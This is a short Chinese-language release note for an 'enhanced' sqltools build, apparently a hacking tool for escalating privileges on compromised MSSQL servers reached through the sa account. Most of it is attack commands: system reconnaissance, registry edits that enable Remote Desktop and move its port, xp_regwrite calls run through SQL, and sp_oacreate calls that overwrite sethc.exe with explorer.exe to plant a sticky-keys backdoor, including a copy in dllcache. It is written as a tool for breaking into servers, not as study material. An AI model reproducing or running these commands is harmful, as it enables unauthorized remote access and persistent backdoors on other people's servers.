sqltools最新增强版

此版本集成了更多的1433服务器恢复提权命令功能,对于目前sa口令许多的功能限制能有效的恢复.

如果此版本不能恢复的,建议可以考虑放弃该服务器的提权.版权为原作者所有，特此声明

命令集成功能说明：

查看系统信息

systeminfo

查看系统终端端口状况

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber

开启系统终端端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
下面两条更改终端端口为2009

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t

REG_DWORD /d 0x7d9 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t

REG_DWORD /d 0x7d9 /f
1、更改软件SQL命令处的Edit控件为ComboBox控件，增加下拉菜单功能,方便存储更多的相关命令

2、菜单功能命令增加部分

查看系统相关信息
EXEC xp_msver
查询终端端口信息
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp’,'PortNumber’
开启终端端口
xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SYSTEM\CurrentControlSet\Control\Terminal Server’, ‘fDenyTSConnections’,'REG_DWORD’,0
复制explorer为shift后门
declare @o int exec sp_oacreate ‘scripting.filesystemobject’, @o out exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’,'c:\windows\system32\sethc.exe’;
declare @oo int exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\sethc.exe’,'c:\windows\system32\dllcache\sethc.exe’;

sqltools深度命令成版